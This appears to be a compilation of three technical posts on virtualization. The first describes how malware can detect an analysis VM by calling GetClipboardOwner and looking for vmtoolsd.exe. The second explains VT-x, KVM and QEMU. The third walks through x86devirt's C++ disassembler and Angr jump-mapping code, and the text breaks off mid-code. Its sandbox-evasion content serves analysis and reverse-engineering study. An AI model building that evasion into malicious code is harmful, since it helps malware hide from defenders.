By checking what process recently modified the clipboard we have a good chance of determining that the program is running inside the virtual machine. All you have to do is to call GetClipboardOwner API to determine the window that is the owner of the clipboard at the time of calling, and from there, the process name via e.g. GetWindowThreadProcessId. Yup, it’s that simple. While it may not work all the time, it is just yet another way of testing the environment.

If you want to check how and if it works on your VM snapshots you can use this little program: ClipboardOwnerDebug.exe

This is what I see on my win7 vm snapshot after I revert to its last state and run the ClipboardOwnerDebug.exe program:

Notably, I didn’t drag&drop/copy paste the ClipboardOwnerDebug.exe file to VM, I actually copied it via a network share to ensure my clipboard doesn’t change during this test; and, even if I did just CTRL+C (copy) the file on the host and CTRL+V (paste) it on the guest the result would be very similar anyway. The vmtoolsd.exe process just gets involved all the time.

The malware doesn’t need to rely on the first call to the GetClipboardOwner API. It could stall for a bit observing changes to the clipboard owner windows and testing if at any point there is a reference to a well-known virtualization process. Anytime the context of copying to clipboard changes between the host and the guest OS (very often when you do manual reversing), the clipboard window ownership will change, even if just temporarily.

The below is an example of the clipboard ownership changing during a simple VM session where things are copied to clipboard a few time, both on the host and on the guest and the context of the the clipboard changes. The context switch means that when the guest gets the mouse/keyboard focus, the changes to host clipboard are immediately reflected by the appearance of the vmtoolsd.exe process on the list:

https://github.com/DissectMalware/ClipboardWatcher

Intel Virtualisation: How VT-x, KVM and QEMU Work Together

VT-x is name of CPU virtualisation technology by Intel. KVM is component of Linux kernel which makes use of VT-x. And QEMU is a user-space application which allows users to create virtual machines. QEMU makes use of KVM to achieve efficient virtualisation. In this article we will talk about how these three technologies work together. Don’t expect an in-depth exposition about all aspects here, although in future, I might follow this up with more focused posts about some specific parts.

Something About Virtualisation First

Let’s first touch upon some theory before going into main discussion. Related to virtualisation is concept of emulation – in simple words, faking the hardware. When you use QEMU or VMWare to create a virtual machine that has ARM processor, but your host machine has an x86 processor, then QEMU or VMWare would emulate or fake ARM processor. When we talk about virtualisation we mean hardware assisted virtualisation where the VM’s processor matches host computer’s processor. Often conflated with virtualisation is an even more distinct concept of containerisation. Containerisation is mostly a software concept and it builds on top of operating system abstractions like process identifiers, file system and memory consumption limits. In this post we won’t discuss containers any more.

A typical VM set up looks like below:

vm-arch

 

At the lowest level is hardware which supports virtualisation. Above it, hypervisor or virtual machine monitor (VMM). In case of KVM, this is actually Linux kernel which has KVM modules loaded into it. In other words, KVM is a set of kernel modules that when loaded into Linux kernel turn the kernel into hypervisor. Above the hypervisor, and in user space, sit virtualisation applications that end users directly interact with – QEMU, VMWare etc. These applications then create virtual machines which run their own operating systems, with cooperation from hypervisor.

Finally, there is “full” vs. “para” virtualisation dichotomy. Full virtualisation is when OS that is running inside a VM is exactly the same as would be running on real hardware. Paravirtualisation is when OS inside VM is aware that it is being virtualised and thus runs in a slightly modified way than it would on real hardware.

VT-x

VT-x is CPU virtualisation for Intel 64 and IA-32 architecture. For Intel’s Itanium, there is VT-I. For I/O virtualisation there is VT-d. AMD also has its virtualisation technology called AMD-V. We will only concern ourselves with VT-x.

Under VT-x a CPU operates in one of two modes: root and non-root. These modes are orthogonal to real, protected, long etc, and also orthogonal to privilege rings (0-3). They form a new “plane” so to speak. Hypervisor runs in root mode and VMs run in non-root mode. When in non-root mode, CPU-bound code mostly executes in the same way as it would if running in root mode, which means that VM’s CPU-bound operations run mostly at native speed. However, it doesn’t have full freedom.

Privileged instructions form a subset of all available instructions on a CPU. These are instructions that can only be executed if the CPU is in higher privileged state, e.g. current privilege level (CPL) 0 (where CPL 3 is least privileged). A subset of these privileged instructions are what we can call “global state-changing” instructions – those which affect the overall state of CPU. Examples are those instructions which modify clock or interrupt registers, or write to control registers in a way that will change the operation of root mode. This smaller subset of sensitive instructions are what the non-root mode can’t execute.

VMX and VMCS

Virtual Machine Extensions (VMX) are instructions that were added to facilitate VT-x. Let’s look at some of them to gain a better understanding of how VT-x works.

VMXON: Before this instruction is executed, there is no concept of root vs non-root modes. The CPU operates as if there was no virtualisation. VMXON must be executed in order to enter virtualisation. Immediately after VMXON, the CPU is in root mode.

VMXOFF: Converse of VMXON, VMXOFF exits virtualisation.

VMLAUNCH: Creates an instance of a VM and enters non-root mode. We will explain what we mean by “instance of VM” in a short while, when covering VMCS. For now think of it as a particular VM created inside QEMU or VMWare.

VMRESUME: Enters non-root mode for an existing VM instance.

When a VM attempts to execute an instruction that is prohibited in non-root mode, CPU immediately switches to root mode in a trap-like way. This is called a VM exit.

Let’s synthesise the above information. CPU starts in a normal mode, executes VMXON to start virtualisation in root mode, executes VMLAUNCH to create and enter non-root mode for a VM instance, VM instance runs its own code as if running natively until it attempts something that is prohibited, that causes a VM exit and a switch to root mode. Recall that the software running in root mode is hypervisor. Hypervisor takes action to deal with the reason for VM exit and then executes VMRESUME to re-enter non-root mode for that VM instance, which lets the VM instance resume its operation. This interaction between root and non-root mode is the essence of hardware virtualisation support.

Of course the above description leaves some gaps. For example, how does hypervisor know why VM exit happened? And what makes one VM instance different from another? This is where VMCS comes in. VMCS stands for Virtual Machine Control Structure. It is basically a 4KiB part of physical memory which contains information needed for the above process to work. This information includes reasons for VM exit as well as information unique to each VM instance so that when CPU is in non-root mode, it is the VMCS which determines which instance of VM it is running.

As you may know, in QEMU or VMWare, we can decide how many CPUs a particular VM will have. Each such CPU is called a virtual CPU or vCPU. For each vCPU there is one VMCS. This means that VMCS stores information on CPU-level granularity and not VM level. To read and write a particular VMCS, VMREAD and VMWRITE instructions are used. They effectively require root mode so only hypervisor can modify VMCS. Non-root VM can perform VMWRITE but not to the actual VMCS, but a “shadow” VMCS – something that doesn’t concern us immediately.

There are also instructions that operate on whole VMCS instances rather than individual VMCSs. These are used when switching between vCPUs, where a vCPU could belong to any VM instance. VMPTRLD is used to load the address of a VMCS and VMPTRST is used to store this address to a specified memory address. There can be many VMCS instances but only one is marked as current and active at any point. VMPTRLD marks a particular VMCS as active. Then, when VMRESUME is executed, the non-root mode VM uses that active VMCS instance to know which particular VM and vCPU it is executing as.

Here it’s worth noting that all the VMX instructions above require CPL level 0, so they can only be executed from inside the Linux kernel (or other OS kernel).

VMCS basically stores two types of information:

  1. Context info which contains things like CPU register values to save and restore during transitions between root and non-root.
  2. Control info which determines behaviour of the VM inside non-root mode.

More specifically, VMCS is divided into six parts.

  1. Guest-state stores vCPU state on VM exit. On VMRESUME, vCPU state is restored from here.
  2. Host-state stores host CPU state on VMLAUNCH and VMRESUME. On VM exit, host CPU state is restored from here.
  3. VM execution control fields determine the behaviour of VM in non-root mode. For example hypervisor can set a bit in a VM execution control field such that whenever VM attempts to execute RDTSC instruction to read timestamp counter, the VM exits back to hypervisor.
  4. VM exit control fields determine the behaviour of VM exits. For example, when a bit in VM exit control part is set then debug register DR7 is saved whenever there is a VM exit.
  5. VM entry control fields determine the behaviour of VM entries. This is counterpart of VM exit control fields. A symmetric example is that setting a bit inside this field will cause the VM to always load DR7 debug register on VM entry.
  6. VM exit information fields tell hypervisor why the exit happened and provide additional information.

There are other aspects of hardware virtualisation support that we will conveniently gloss over in this post. Virtual to physical address conversion inside VM is done using a VT-x feature called Extended Page Tables (EPT). Translation Lookaside Buffer (TLB) is used to cache virtual to physical mappings in order to save page table lookups. TLB semantics also change to accommodate virtual machines. Advanced Programmable Interrupt Controller (APIC) on a real machine is responsible for managing interrupts. In VM this too is virtualised and there are virtual interrupts which can be controlled by one of the control fields in VMCS. I/O is a major part of any machine’s operations. Virtualising I/O is not covered by VT-x and is usually emulated in user space or accelerated by VT-d.

KVM

Kernel-based Virtual Machine (KVM) is a set of Linux kernel modules that when loaded, turn Linux kernel into hypervisor. Linux continues its normal operations as OS but also provides hypervisor facilities to user space. KVM modules can be grouped into two types: core module and machine specific modules. kvm.ko is the core module which is always needed. Depending on the host machine CPU, a machine specific module, like kvm-intel.ko or kvm-amd.ko will be needed. As you can guess, kvm-intel.ko uses the functionality we described above in VT-x section. It is KVM which executes VMLAUNCH/VMRESUME, sets up VMCS, deals with VM exits etc. Let’s also mention that AMD’s virtualisation technology AMD-V also has its own instructions and they are called Secure Virtual Machine (SVM). Under `arch/x86/kvm/` you will find files named `svm.c` and `vmx.c`. These contain code which deals with virtualisation facilities of AMD and Intel respectively.

KVM interacts with user space – in our case QEMU – in two ways: through device file `/dev/kvm` and through memory mapped pages. Memory mapped pages are used for bulk transfer of data between QEMU and KVM. More specifically, there are two memory mapped pages per vCPU and they are used for high volume data transfer between QEMU and the VM in kernel.

`/dev/kvm` is the main API exposed by KVM. It supports a set of `ioctl`s which allow QEMU to manage VMs and interact with them. The lowest unit of virtualisation in KVM is a vCPU. Everything builds on top of it. The `/dev/kvm` API is a three-level hierarchy.

  1. System Level: Calls this API manipulate the global state of the whole KVM subsystem. This, among other things, is used to create VMs.
  2. VM Level: Calls to this API deal with a specific VM. vCPUs are created through calls to this API.
  3. vCPU Level: This is lowest granularity API and deals with a specific vCPU. Since QEMU dedicates one thread to each vCPU (see QEMU section below), calls to this API are done in the same thread that was used to create the vCPU.

After creating vCPU QEMU continues interacting with it using the ioctls and memory mapped pages.

QEMU

Quick Emulator (QEMU) is the only user space component we are considering in our VT-x/KVM/QEMU stack. With QEMU one can run a virtual machine with ARM or MIPS core but run on an Intel host. How is this possible? Basically QEMU has two modes: emulator and virtualiser. As an emulator, it can fake the hardware. So it can make itself look like a MIPS machine to the software running inside its VM. It does that through binary translation. QEMU comes with Tiny Code Generator (TCG). This can be thought if as a sort of high-level language VM, like JVM. It takes for instance, MIPS code, converts it to an intermediate bytecode which then gets executed on the host hardware.

The other mode of QEMU – as a virtualiser – is what achieves the type of virtualisation that we are discussing here. As virtualiser it gets help from KVM. It talks to KVM using ioctl’s as described above.

QEMU creates one process for every VM. For each vCPU, QEMU creates a thread. These are regular threads and they get scheduled by the OS like any other thread. As these threads get run time, QEMU creates impression of multiple CPUs for the software running inside its VM. Given QEMU’s roots in emulation, it can emulate I/O which is something that KVM may not fully support – take example of a VM with particular serial port on a host that doesn’t have it. Now, when software inside VM performs I/O, the VM exits to KVM. KVM looks at the reason and passes control to QEMU along with pointer to info about the I/O request. QEMU emulates the I/O device for that requests – thus fulfilling it for software inside VM – and passes control back to KVM. KVM executes a VMRESUME to let that VM proceed.

In the end, let us summarise the overall picture in a diagram:

overall-diag

Project: x86-devirt

Unpackme — x86 Virtualizer

Today, I am going to be going through how x86devirt works to disassemble and devirtualize the behaviour of code obfuscated using the x86virt virtual machine. I needed several tools to complete this task, the development of which will be covered in this article.

A code virtualizer protects code behaviour by retargeting some subroutines or sections of code from the x86/x64 platform (which is well understood and documented) into a (usually somewhat random) platform that we do not understand. Additionally, the tools we use to discover and analyze behaviour in executable code (such as radare2 or x64dbg) also do not understand it well. This makes identifying malicious behaviour, developing generic signatures or extracting other behavioral details from the code impossible without reversing the process in some way.

While it costs a large overhead in performance, obfuscation using code virtualization is very effective. Depending on the complexity of the protector/virtualizer, these packers can be very painful and tedious to work through.

Resources

You can see the final product (devirtualizer) of this article at the following GitHub URL: https://github.com/JeremyWildsmith/x86devirt

We are reverse engineering an unpackme by ReWolf at the following URL: https://tuts4you.com/download/1850/

This sample has been packed with an open-source application by ReWolf that is publicly posted on GitHub at the following URL: https://github.com/rwfpl/rewolf-x86-virtualizer

If you would like to look at a very simple example of a virtual machine, I have a project up on my GitHub that demonstrates the basic function of a VM Stub and you can see how exactly it works. The project is located at the following URL: https://github.com/JeremyWildsmith/StackLang

Tools / Knowledge

In this article I am going to use the following tools & knowledge:

  • The disassembler, written in the C++ programming language
  • x86 Intel Assembly
  • YARA Signatures
  • The udis86 library, used to disassemble x86 instructions
  • Python, used to automate x64dbg and the x64dbgpy plugin, as well as run Angr simulations to extract the jmp mappings
  • The x86virt unpackme sample by ReWolf on tuts4you.com (https://tuts4you.com/download/1850/)

How the x86virt VM Works

Before I dive into how x86devirt works, I am going to give a brief overview on my findings of how the x86virt VM works.

x86virt starts by taking the application to be protected and grabbing some subroutines that it has decided to protect. The x86 code for these subroutines is translated into an instruction set that uses the following format:

(Instruction Size)(Instruction Prefix)(Instruction Data)

  • Instruction Size — The size in bytes of the instruction
  • Instruction Prefix — This is 0xFFFF if the instruction is a VM instruction. Otherwise, the remaining bytes in the instruction data (and instruction prefix) should be interpreted as a x86 instruction
  • Instruction Data — If (Instruction Prefix) is 0xFFFF, this is the VM Opcode bytes followed by the operand bytes. Otherwise, these bytes are appended to the (Instruction Prefix) to form a valid x86 instruction.

For every VM Layer or virtualized target, x86virt randomizes the opcodes for that VM. So when we devirtualize, we need to map the opcodes to their respective VM instruction.

x86virt also takes instructions like the ones below:

mov eax, [esp + 0x8]

And translates them into something like this:

mov VMR, 0x8
add VMR, esp
mov eax, [VMR]

VMR is a register that only exists in the virtual machine, so during devirtualization, we need to interpret this and translate it back into its original form.

Finally, x86virt encrypts the entire instruction using an encryption algorithm that is, to some extent, randomized. Every time an instruction is executed, it is first decrypted and then interpreted. However, there is one consistency with instruction encryption between targets and VM layers: regardless of how the instruction was encrypted, in its encrypted form, the first byte XORed with the second byte will always give you the instruction length.

Another important note regarding instruction encryption is that the key to decrypt it is the address of that VM instruction relative to the start of the virtual function/code stub it belongs to. In other words, the key is the offset to that instruction in the function that has been virtualized. This means you cannot just blindly decrypt all the instructions in a function. You must do proper control flow analysis to determine where in memory the valid bytecode instructions are by identifying and following conditional or unconditional jumps.

So to disassemble an x86virt VM instruction, we must know:

  1. The size of the instruction
  2. The offset to that instruction
  3. The encryption algorithm (because it is somewhat random)

There is one last piece of the puzzle that we must consider when disassembling x86virt VM code. The conditional jumps for x86virt VM are encoded with a jump type operand. The part of the code that interprets the jump type operand is also somewhat random between VM layers and virtualized targets. We need to handle this case in our devirtualizer as well.

The x86devirt Disassembler

An important part to the x86-devirtualizer is the disassembler. The role of this module is to take a stub of virtualized, encrypted x86virt bytecode that has been extracted from the protected application and produce a NASM x86 Assembly translation of the encrypted bytecode. To do this, it needs a few pieces of information from the protected application:

  1. A dump of the decryption algorithm that the VM stub uses to decrypt VM instruction before interpreting them
  2. The mappings of opcodes to their respective behaviour, since the opcodes are randomized (i.e, 0x33 maps to add, 0x22 maps to mov)
  3. The mappings of jmp type operand to their respective jump behavior (i.e, jmp type 2 maps to je, 3 maps to jne, etc…)
  4. A dump of the function / stub of code to be devirtualized

We will see how this information is extracted by looking at the x86devirt.py x64dbg plugin later, but for now we will assume we have been provided this information.

The first step is to get the instruction length, decrypt the instruction and then identify whether we should interpret the instruction as an x86 instruction or a VM bytecode instruction. We see this being done in disassemblers’ decodeVmInstruction method:

unsigned int decodeVmInstruction(vector<DecodedVmInstruction>& decodedBuffer, uint32_t vmRelativeIp, VmInfo& vmInfo) {

    uint32_t instrLength = getInstructionLength(vmInfo.getBaseAddress() + vmRelativeIp, vmInfo);

    //Read with offset 1, to trim off instr length byte
    unique_ptr<uint8_t[]> instrBuffer = vmInfo.readMemory(vmInfo.getBaseAddress() + vmRelativeIp + 1, instrLength);
    vmInfo.decryptMemory(instrBuffer.get(), instrLength, vmRelativeIp);

    DecodedInstructionType_t instrType = DecodedInstructionType_t::INSTR_UNKNOWN;

    if(*reinterpret_cast<unsigned short*>(instrBuffer.get()) == 0xFFFF) {
        //Offset by 2 which removes the 0xFFFF part of the instruction.

        //Map instructions correctly
        instrBuffer[2] = vmInfo.getOpcodeMapping(instrBuffer[2]);
        decodedBuffer = disassembleVmInstruction(instrBuffer.get() + 2, instrLength - 2, vmRelativeIp, vmInfo);
    } else {
        decodedBuffer = disassemble86Instruction(instrBuffer.get(), instrLength, vmInfo.getBaseAddress() + vmRelativeIp);
    }

    return instrLength + 1;
}

We see that the size is extracted using the getInstructionLength method (this will simply XOR the first two bytes to get the length). After that, the instruction is decrypted by using the dumped decryption subroutine extracted from the protected application (a more proper approach would be to emulate the code rather than directly executing it). Finally, we examine the first word to identify how to decode the instruction (as an x86 instruction or as a VM instruction). If the instruction is a VM bytecode instruction, we need to look up the opcode in the opcode mapping to determine what behaviour it maps to.

The way we disassemble x86 instructions is by using the udis86 library, and also keeping some basic information about the disassembled instruction. You can see how that is done below:

vector<DecodedVmInstruction> disassemble86Instruction(const uint8_t* instrBuffer, uint32_t instrLength, const uint32_t instrAddress) {
    DecodedVmInstruction result;
    result.isDecoded = false;
    result.address = instrAddress;
    result.controlDestination = 0;
    result.size = instrLength;

    memcpy(result.bytes, instrBuffer, instrLength);

    ud_set_input_buffer(&ud_obj, instrBuffer, instrLength);
    ud_set_pc(&ud_obj, instrAddress);
    unsigned int ret = ud_disassemble(&ud_obj);
    strcpy(result.disassembled, ud_insn_asm(&ud_obj));

    if(ret == 0)
        result.type = DecodedInstructionType_t::INSTR_UNKNOWN;
    else
        result.type = (!strncmp(result.disassembled, "ret", 3) ? DecodedInstructionType_t::INSTR_RETN : DecodedInstructionType_t::INSTR_MISC);

    vector<DecodedVmInstruction> resultSet;
    resultSet.push_back(result);

    return resultSet;
}

When it comes to disassembling x86virt bytecode instructions, we do that with a different subroutine, disassembleVmInstruction. The purpose of this subroutine is fairly straightforward so I won’t bore you by reading the code line by line. However, some interesting cases are case 1 and case 2, which are essentially x86 instructions with VMR as the operand. It is also worth noting case 7 where the decoding of x86virt jump instructions are handled and case 16 which just signals for the VM to stop interpreting (and has no x86 equivalent)

Once we can disassemble the instructions, we need to properly identify where they are. As was previously mentioned, this requires some control flow analysis. During control flow analysis, the disassembler identifies the different blocks of code in a subroutine by using the getDisassembleRegions function. The getDisassembleRegions basically returns the regions of code in a method that can be reached using conditional or unconditional jumps inside of a virtualized function. We can see its behaviour below:

vector<DisassembledRegion> getDisassembleRegions(const uint32_t initialIp, VmInfo& vmInfo) {
    vector<DisassembledRegion> disassembledStubs;
    queue<uint32_t> stubsToDisassemble;
    stubsToDisassemble.push(initialIp);

    while(!stubsToDisassemble.empty()) {
        uint32_t vmRelativeIp = stubsToDisassemble.front() - vmInfo.getBaseAddress();
        stubsToDisassemble.pop();

        if(isInRegions(disassembledStubs, vmRelativeIp))
            continue;

        DisassembledRegion current;
        current.min = vmRelativeIp;

        bool continueDisassembling = true;
        while(vmRelativeIp <= vmInfo.getDumpSize() && continueDisassembling) {

            vector<DecodedVmInstruction> instrSet;

            vmRelativeIp += decodeVmInstruction(instrSet, vmRelativeIp, vmInfo);

            for(auto& instr : instrSet) {
                if(instr.type == DecodedInstructionType_t::INSTR_UNKNOWN) {
                    stringstream msg;
                    msg << "Unknown instruction encountered: 0x" << hex << ((unsigned long)instr.bytes[0]);
                    throw runtime_error(msg.str());
                }

                if(instr.type == DecodedInstructionType_t::INSTR_JUMP || instr.type == DecodedInstructionType_t::INSTR_CONDITIONAL_JUMP)
                    stubsToDisassemble.push(instr.controlDestination);

                if(instr.type == DecodedInstructionType_t::INSTR_STOP || instr.type == DecodedInstructionType_t::INSTR_RETN || instr.type == DecodedInstructionType_t::INSTR_JUMP)
                    continueDisassembling = false;
            }
        }

        current.max = vmRelativeIp;
        disassembledStubs.push_back(current);
    }

    //Now we must resolve all overlapping stubs
    for(auto it = disassembledStubs.begin(); it != disassembledStubs.end();) {
        if(isInRegions(disassembledStubs, it->min, it->max))
            disassembledStubs.erase(it++);
        else
            it++;
    }

    return disassembledStubs;
}

The getDisassembleRegions performs the following functionality:

  1. Disassemble the virtualized subroutine from its start address and continues to do so until it encounters a jump (conditional or unconditional) or a return.
  2. If a conditional jump is encountered, its destination address is queued up to be the next region to be disassembled and the disassembler continues executing.
  3. If an unconditional jump is encountered, the destination address is queued up and disassembling of the current block ends
  4. If a ret is encountered, disassembling of the current block ends.
  5. Loops until there are no more regions to be disassembled.

The problem with the above algorithm is that it will identify code such as what is seen below:

labelD:
...
...
labelA:
...
...
jmp labelB
...
...
labelB:
...
...
jz labelD
...

As having overlapping blocks of code, which will result in redundant blocks of code and thus redundant disassembled output. This was solved by testing for and removing smaller overlapping regions:

    //Now we must resolve all overlapping stubs
    for(auto it = disassembledStubs.begin(); it != disassembledStubs.end();) {
        if(isInRegions(disassembledStubs, it->min, it->max))
            disassembledStubs.erase(it++);
        else
            it++;
    }

    return disassembledStubs;

After we know the basic blocks of a subroutine that contain valid executable code, we can begin disassembling them. This is done in the disassembleStub routine:

bool disassembleStub(const uint32_t initialIp, VmInfo& vmInfo) {

    vector<DisassembledRegion> stubs = getDisassembleRegions(initialIp, vmInfo);

    //Needs to be sorted, otherwise (due to jump sizes) may not fit into original location
    //Sorting should match it with the way it was implemented.
    sort(stubs.begin(), stubs.end(), sortRegionsAscending);

    if(stubs.empty()) {
        printf(";No stubs detected to disassemble.. %d", stubs.size());
        return true;
    }

    vector<DecodedVmInstruction> instructions;
    for(auto& stub : stubs) {

        bool continueDisassembling = true;
        DecodedVmInstruction blockMarker;
        blockMarker.type = DecodedInstructionType_t::INSTR_COMMENT;
        strcpy(blockMarker.disassembled, "BLOCK");
        instructions.push_back(blockMarker);
        for(uint32_t vmRelativeIp = stub.min; continueDisassembling && vmRelativeIp < stub.max;) {

            vector<DecodedVmInstruction> instrSet;

            vmRelativeIp += decodeVmInstruction(instrSet, vmRelativeIp, vmInfo);

            for(auto& instr : instrSet) {
                if(instr.type == DecodedInstructionType_t::INSTR_UNKNOWN)
                    throw runtime_error("Unknown instruction encountered");

                if(instr.type == DecodedInstructionType_t::INSTR_STOP) {
                    continueDisassembling = false;
                    break;
                }

                instructions.push_back(instr);
            }

        }

        instructions.push_back(blockMarker);
    }

    for(auto& i : eliminateVmr(instructions)) {
        formatInstructionInfo(i);
    }

    return true;
}

An important note with this method is that it sorts the disassembled regions by their start address after doing the control flow analysis with getDisassembledRegions. This sorting must be done because the natural order was thrown out of whack by the queuing nature of the control flow analysis. Functionally, the order doesn’t really make a difference in a normal application because at the end of the day, the code is still going to execute the same way regardless of where the instructions are. However, the way in which the blocks are organized will change the size of the code once it is assembled in NASM due to the way jump instructions are encoded on the x86 platform. Essentially, the distance between the jump instructions and their destination addresses will change depending on the order of the code blocks in the function, and the distance will influence the size of the jump instruction. If the devirtualized code is not the size of its original form (i.e, before it is was passed into x86virt to be virtualized) or smaller, then it will not fit back into where it was ripped from. While functionally, it doesn’t matter that it isn’t in the «proper» location, it does matter later when we encounter multiple VM layers because our signatures will not match partial handlers etc.

Other than that, there isn’t anything too weird or noteworthy here until we encounter the call to eliminateVmr. Remember that I mentioned how x86virt creates a virtual register. We need to eliminate that because we cannot assemble that through NASM or produce valid x86 code while we have a virtual register. Below, we can see the behaviour of eliminateVmr:

vector<DecodedVmInstruction> eliminateVmr(vector<DecodedVmInstruction>& instructions) {
    auto itVmrStart = instructions.end();
    vector<DecodedVmInstruction> compactInstructionlist;

    for(auto it = instructions.begin(); it != instructions.end(); it++) {
        if(!strncmp("mov VMR,", it->disassembled, 8) && itVmrStart == instructions.end()) {
            itVmrStart = it;
        }else if(itVmrStart != instructions.end() && strstr(it->disassembled, "[VMR]") != 0)
        {
            for(auto listing = itVmrStart; listing != it+1; listing++) {
                DecodedVmInstruction comment = *listing;
                comment.type = INSTR_COMMENT;
                compactInstructionlist.push_back(comment);
            }
            compactInstructionlist.push_back(eliminateVmrFromSubset(itVmrStart, it + 1));
            itVmrStart = instructions.end();
        } else if (itVmrStart == instructions.end()) {
            compactInstructionlist.push_back(*it);
        }
    }

    return compactInstructionlist;
}

The way VMR is used in the virtualized code is fairly convenient. VMR is essentially used to calculate pointer addresses. For example, it only ever appears in a similar form to:

mov VMR, 0
add VMR, ecx
shl VMR, 2
add VMR, 15
mov eax, [VMR]

It always starts with operations on VMR and ends with VMR being dereferenced. This means that we can essentially replace all of those instructions with:

mov eax, [ecx * 2 + 15]

So eliminateVmr will look for a pattern where the destination operand is VMR and then some operations on VMR followed by a dereference on VMR. Everything between that pattern can always be simplified using the same algorithm. You can see the specifics of that algorithm in eliminateVmrFromSubset:

DecodedVmInstruction eliminateVmrFromSubset(vector<DecodedVmInstruction>::iterator start, vector<DecodedVmInstruction>::iterator end) {
    bool baseReg2Used = false;
    bool baseReg1Used = false;
    char baseReg1Buffer[10];
    char baseReg2Buffer[10];
    uint32_t multiplierReg1 = 1;
    uint32_t multiplierReg2 = 1;

    uint32_t offset = 0;

    for(auto it = start; it != end; it++) {
        char* dereferencePointer = 0;

        if(!strncmp(it->disassembled, "mov VMR, 0x", 11)) {
            offset = strtoul(&it->disassembled[11], NULL, 16);
            baseReg1Used = false;
            baseReg2Used = false;
            multiplierReg1 = multiplierReg2 = 1;
        } else if(!strncmp(it->disassembled, "mov VMR, ", 9)) {
            baseReg1Used = true;
            baseReg2Used = false;
            multiplierReg1 = multiplierReg2 = 1;
            offset = 0;
            strcpy(baseReg1Buffer, &it->disassembled[9]);
        } else if(!strncmp(it->disassembled, "add VMR, 0x", 11)) {
            offset += strtoul(&it->disassembled[11], NULL, 16);
        } else if(!strncmp(it->disassembled, "add VMR, ", 9)) {
            if(baseReg1Used) {
                baseReg2Used = true;
                strcpy(baseReg2Buffer, &it->disassembled[9]);
            } else {
                baseReg1Used = true;
                strcpy(baseReg1Buffer, &it->disassembled[9]);    
            }
        } else if(!strncmp(it->disassembled, "shl VMR, 0x", 11)) {
            uint32_t shift = strtoul(&it->disassembled[11], NULL, 16);
            offset = offset << shift;
            if(baseReg1Used) {
                multiplierReg1 = multiplierReg1 << shift;
            }
            if(baseReg2Used) {
                multiplierReg2 = multiplierReg2 << shift;
            }
        }
    }

    auto lastInstruction = end - 1;
    string reconstructInstr(lastInstruction->disassembled);
    stringstream reconstructed;

    reconstructed << "[";

    if(baseReg1Used) {
        if(multiplierReg1 != 1)
            reconstructed << "0x" << hex << multiplierReg1 << " * ";

        reconstructed << baseReg1Buffer;
    }

    if(baseReg2Used) {
        reconstructed << " + ";
        if(multiplierReg2 != 1)
            reconstructed << "0x" << hex << multiplierReg2 << " * ";

        reconstructed << baseReg2Buffer;
    }

    if(offset != 0 || !(baseReg1Used))
        reconstructed <<  " + 0x" << hex << offset;

    reconstructed << "]";

    reconstructInstr.replace(reconstructInstr.find("[VMR]"), 5, reconstructed.str());

    DecodedVmInstruction result;

    result.isDecoded = true;
    result.address = start->address;
    result.size = 0;
    result.type = lastInstruction->type;
    strcpy(result.disassembled, reconstructInstr.c_str());

    return result;
}

Once VMR is eliminated, all that is left to do is print out the disassembly, which we can see being done here in disassembleStub:

...
    for(auto& i : eliminateVmr(instructions)) {
        formatInstructionInfo(i);
    }
...

Generating a Jump Map with Angr

As I mentioned earlier, when it comes to the x86virt bytecode conditional / unconditional jump instruction handler, we need to extract the jump mappings (that is, which value in the jump type operand matches which type of jump). The way the x86virt jump handler works is that it takes the first operand (which is the jump type) and passes it into a somewhat randomly generated subroutine. This subroutine returns true if the EFLAGS are in a condition that permits jumping, or false otherwise.

Because this subroutine is not static and is a bit different for every VM Layer or virtualized target, we need some way of extracting these mappings out of that randomly generated subroutine. If you are not familiar with Angr or symbolic execution, I suggest you read a tiny bit on it before reading this section because the learning curve can be a bit steep.

The jump maps are extracted by running an Angr simulation on the jump decoder that was extracted from the protected application. The simulation is done in x86devirt_jmp.py and the dump of the decoder is provided by x86devirt.py (which we will get into later).

The way this was performed was first by creating a table of x86 jump types with EFLAG values that permit a jump to be taken for that jump type and EFLAG values that do not permit a jump to be taken. Additionally, all jump types in the table were prioritized.

Jump type priority worked by giving x86 jump types that test less flags a lower priority than jump types that test more flags. The reason jump types need to be prioritized is because there is overlap in the conditions that need to be checked for different jumps. An example of this is the JZ jump (ZF = 0) and the JA (ZF = 0 and CF = 0) jump. Essentially, if a set of x candidate x86 jump types can be mapped to a particular jump type y, then y should be mapped to the highest priority jump type in the set of x.

Below we see the list of possible jumps:

possibleJmps = [
    {
        "name": "jz",
        "must": [0x40],
        "not": [0x1, 0],
        "priority": 1
    },
    {
        "name": "jo",
        "must": [0x800],
        "not": [0],
        "priority": 1
    },
    ...
    ...

Below is the code responsible for mapping which emulated states permit jumping and which states do not, for all jump types (0-15):

def getJmpStatesMap(proj):
    statesMap = {}

    state = proj.factory.blank_state(addr=0x0)
    state.add_constraints(state.regs.edx >= 0)
    state.add_constraints(state.regs.edx <= 15)
    simgr = proj.factory.simulation_manager(state)
    r = simgr.explore(find=0xDA, avoid=0xDE, num_find=100)

    for state in r.found:
        val = state.solver.eval(state.regs.edx)
        val = val - 0xD
        val = val / 2

        if(not statesMap.has_key(val)):
            statesMap[val] = {"must": [], "not": []}

        statesMap[val]["must"].append(state)

    state = proj.factory.blank_state(addr=0x0)
    state.add_constraints(state.regs.edx >= 0)
    state.add_constraints(state.regs.edx <= 15)
    simgr = proj.factory.simulation_manager(state)
    r = simgr.explore(find=0xDE, avoid=0xDA, num_find=100)

    for state in r.found:
        val = state.solver.eval(state.regs.edx)
        val = val - 0xD
        val = val / 2

        statesMap[val]["not"].append(state)

    return statesMap

The method essentially performs the following:

  1. Iterate through all states that reach a positive/negative return (jump allowed or not allowed to be taken)
  2. Resolve the constraint on the jump type (Jump type is stored in EDX)
  3. Append that state to either the «must» set, which is states that reached a positive return permitting the jump to be taken (offset 0xDA in the dumped jump decoder code) or «not» (offset 0xDE in the dumped jump decoder code)

After we know which states permit jumping or restrict jumping for each jump type, we can begin testing the constraints on the EFLAGS register that allow for arriving at those states to determine which kind of x86 jump it maps to:

def decodeJumps(inputFile):
    proj = angr.Project(inputFile, main_opts={'backend': 'blob', 'custom_arch': 'i386'}, auto_load_libs=False)

    stateMap = getJmpStatesMap(proj)
    jumpMappings = {}
    for key, val in stateMap.iteritems():

        for jmp in possibleJmps:
            satisfiedMustsRemaining = len(jmp["must"])
            satisfiedNotsRemaining = len(jmp["not"])

            for state in val["must"]:
                for con in jmp["must"]:
                    if (state.solver.satisfiable(
                            extra_constraints=[state.regs.eax & controlFlowBits == con & controlFlowBits])):
                        satisfiedMustsRemaining -= 1;

            for state in val["not"]:
                for con in jmp["not"]:
                    if (state.solver.satisfiable(
